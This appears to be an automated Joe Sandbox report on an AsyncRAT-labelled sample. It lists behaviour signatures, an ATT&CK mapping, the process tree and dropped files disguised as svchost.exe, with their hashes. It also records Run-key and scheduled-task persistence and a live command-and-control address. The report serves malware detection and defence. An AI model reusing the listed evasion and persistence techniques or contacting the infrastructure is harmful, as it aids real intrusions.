                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: svchost.exe, 00000003.00000002.2925287973.000000001BEB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2914398163.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 6204, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: FullOption_2.1Xenos.exe PID: 6632, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: svchost.exe PID: 5280, type: MEMORYSTR
                Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                Remote Access Functionality

                Source: Yara match File source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2914398163.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 6204, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: FullOption_2.1Xenos.exe PID: 6632, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: svchost.exe PID: 5280, type: MEMORYSTR
                Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; the numeric badges the report attaches to observed techniques are kept in parentheses exactly as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); Scheduled Task/Job (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (112); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (11); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (151); Process Injection (112); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (541); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (23); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1583455, Sample: file.exe, Start date: 02/01/2025, Architecture: WINDOWS, Score: 100

Start node
  DNS/IP: ip-api.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures
  • file.exe (started)
    Dropped: C:\Users\user\AppData\Roaming\svchost.exe (PE32); C:\Users\user\...\FullOption_2.1Xenos.exe (PE32); C:\Users\user\AppData\Local\...\file.exe.log (CSV)
    Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops PE files with benign system names
    • svchost.exe (started)
      Network: 45.141.26.134, 49788, 7000 SPECTRAIPSpectraIPBVNL Netherlands; ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States
      Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 6 other signatures
      • powershell.exe (started), signature: Loading BitLocker PowerShell Module; started conhost.exe
      • powershell.exe (started); started conhost.exe
      • powershell.exe (started); started conhost.exe
      • 2 other processes (started); started conhost.exe, conhost.exe
    • FullOption_2.1Xenos.exe (started)
      Signatures: Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      • svchost.exe (started)
      • FullOption_2.1Xenos.exe (started)
  • svchost.exe (started)
  • svchost.exe (started)
  • 2 other processes (started)

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
file.exe | 71% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
file.exe | 100% | Avira | TR/Dropper.Gen
file.exe | 100% | Joe Sandbox ML | -

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | 83% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Roaming\svchost.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://crl.microso | 0% | Avira URL Cloud | safe
45.141.26.134 | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
ip-api.com | 208.95.112.1 | true | false | - | high
Contacted IPs and URLs (Name | Malicious | Antivirus Detection | Reputation):
45.141.26.134 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | - | high
URLs found in memory (Name | Source | Malicious | Antivirus Detection | Reputation):
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.m | powershell.exe, 00000010.00000002.2314732137.000001A6FE9CC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://go.micros | powershell.exe, 00000009.00000002.1920456209.00000291D19F3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microso | powershell.exe, 00000010.00000002.2316272859.000001A6FEA1D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.microsoft.co | powershell.exe, 0000000E.00000002.2092526125.0000029CC8C24000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.microsoft. | powershell.exe, 00000009.00000002.1922046061.00000291D1ECE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | svchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmp | false | - | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
45.141.26.134 | unknown | Netherlands | 62068 | SPECTRAIPSpectraIPBVNL | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583455
Start date and time: 2025-01-02 20:09:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@28/24@1/2
EGA Information:
• Successful, ratio: 9.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 135
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target FullOption_2.1Xenos.exe, PID 5276 because it is empty
• Execution Graph export aborted for target FullOption_2.1Xenos.exe, PID 6632 because it is empty
• Execution Graph export aborted for target file.exe, PID 6204 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3964 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6932 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 1484 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 2044 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 3840 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 5744 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 5964 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: file.exe
Timeline (Time | Type | Description):
14:10:42 | API Interceptor | 56x Sleep call for process: powershell.exe modified
14:11:43 | API Interceptor | 130x Sleep call for process: svchost.exe modified
20:11:44 | Task Scheduler | Run new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
20:11:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
20:11:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
20:12:01 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Context for IP 208.95.112.1 (Associated Sample Name | Detection | Threat Name | Context):
23khy505ab.exe | malicious | Njrat | ip-api.com/line/?fields=hosting
XClient.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
Java32.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
mcgen.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
intro.avi.exe | malicious | Quasar | ip-api.com/json/
AimStar.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
L988Ph5sKX.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
kj93GnZHBS.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
ANuh30XoVu.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
rivalsanticheat.exe | malicious | XWorm | ip-api.com/line/?fields=hosting

Context for domain ip-api.com (Associated Sample Name | Detection | Threat Name | Context):
23khy505ab.exe | malicious | Njrat | 208.95.112.1
XClient.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
Java32.exe | malicious | XWorm | 208.95.112.1
mcgen.exe | malicious | Blank Grabber | 208.95.112.1
intro.avi.exe | malicious | Quasar | 208.95.112.1
AimStar.exe | malicious | Blank Grabber | 208.95.112.1
L988Ph5sKX.exe | malicious | XWorm | 208.95.112.1
kj93GnZHBS.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ANuh30XoVu.exe | malicious | XWorm | 208.95.112.1
rivalsanticheat.exe | malicious | XWorm | 208.95.112.1

Context for ASN SPECTRAIPSpectraIPBVNL (Associated Sample Name | Detection | Threat Name | Context):
XClient.exe | malicious | AsyncRAT, XWorm | 45.141.26.234
Java32.exe | malicious | XWorm | 45.141.26.234
nklmips.elf | malicious | Unknown | 89.190.159.77
1.elf | malicious | Unknown | 45.141.239.79
TRC.ppc.elf | malicious | Mirai | 45.144.191.245
da6ke5KbfB.exe | malicious | AsyncRAT, Babadeda, XWorm | 45.141.26.234
03VPFXH490.exe | malicious | AsyncRAT, XWorm | 45.141.26.234
saiya.exe | malicious | AsyncRAT, XWorm | 45.141.26.134
windxcmd.exe | malicious | AsyncRAT, XWorm | 45.141.26.134
mips.nn.elf | malicious | Mirai, Okiru | 45.138.53.54

Context for ASN TUT-ASUS (Associated Sample Name | Detection | Threat Name | Context):
23khy505ab.exe | malicious | Njrat | 208.95.112.1
XClient.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
Java32.exe | malicious | XWorm | 208.95.112.1
mcgen.exe | malicious | Blank Grabber | 208.95.112.1
intro.avi.exe | malicious | Quasar | 208.95.112.1
AimStar.exe | malicious | Blank Grabber | 208.95.112.1
L988Ph5sKX.exe | malicious | XWorm | 208.95.112.1
kj93GnZHBS.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ANuh30XoVu.exe | malicious | XWorm | 208.95.112.1
rivalsanticheat.exe | malicious | XWorm | 208.95.112.1
                                                    No context
                                                    No context
Process: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process: C:\Users\user\Desktop\file.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process: C:\Users\user\AppData\Roaming\svchost.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................
